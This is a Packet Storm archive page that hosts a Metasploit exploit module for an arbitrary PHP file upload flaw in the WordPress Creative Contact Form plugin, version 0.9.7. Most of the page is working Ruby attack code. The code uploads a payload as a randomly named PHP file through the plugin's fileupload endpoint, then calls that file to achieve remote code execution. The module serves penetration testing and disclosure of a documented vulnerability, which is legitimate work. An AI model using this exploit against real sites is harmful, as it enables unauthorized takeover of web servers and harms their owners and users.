exploit the possibilities

WordPress Creative Contact Form Upload

WordPress Creative Contact Form Upload
Posted Apr 19, 2015
Authored by Gianni Angelozzi | Site metasploit.com

This Metasploit module exploits an arbitrary PHP code upload in the WordPress Creative Contact Form version 0.9.7. The vulnerability allows for arbitrary file upload and remote code execution.

tags | exploit, remote, arbitrary, php, code execution, file upload
MD5 | 134c796ad1d27553f7d2f3e571bc64cd

WordPress Creative Contact Form Upload

Change Mirror Download
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::HTTP::Wordpress
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Wordpress Creative Contact Form Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary PHP code upload in the WordPress Creative Contact
Form version 0.9.7. The vulnerability allows for arbitrary file upload and remote code execution.
},
'Author' =>
[
'Gianni Angelozzi', # Vulnerability discovery
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['EDB', '35057'],
['OSVDB', '113669'],
['WPVDB', '7652']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Creative Contact Form 0.9.7', {}]],
'DisclosureDate' => 'Oct 22 2014',
'DefaultTarget' => 0)
)
end

def check
check_plugin_version_from_readme('sexy-contact-form', '1.0.0')
end

def exploit
php_pagename = rand_text_alpha(8 + rand(8)) + '.php'

data = Rex::MIME::Message.new
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files[]\"; filename=\"#{php_pagename}\"")
post_data = data.to_s

res = send_request_cgi({
'uri' => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'index.php'),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})

if res
if res.code == 200 && res.body =~ /files|#{php_pagename}/
print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
register_files_for_cleanup(php_pagename)
else
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
end
else
fail_with(Failure::Unknown, 'ERROR')
end

print_status("#{peer} - Calling payload...")
send_request_cgi(
'uri' => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'files', php_pagename)
)
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    22 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    2 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    50 Files
  • 6
    Feb 6th
    24 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    6 Files
  • 9
    Feb 9th
    1 Files
  • 10
    Feb 10th
    1 Files
  • 11
    Feb 11th
    22 Files
  • 12
    Feb 12th
    25 Files
  • 13
    Feb 13th
    16 Files
  • 14
    Feb 14th
    32 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    10 Files
  • 17
    Feb 17th
    2 Files
  • 18
    Feb 18th
    27 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close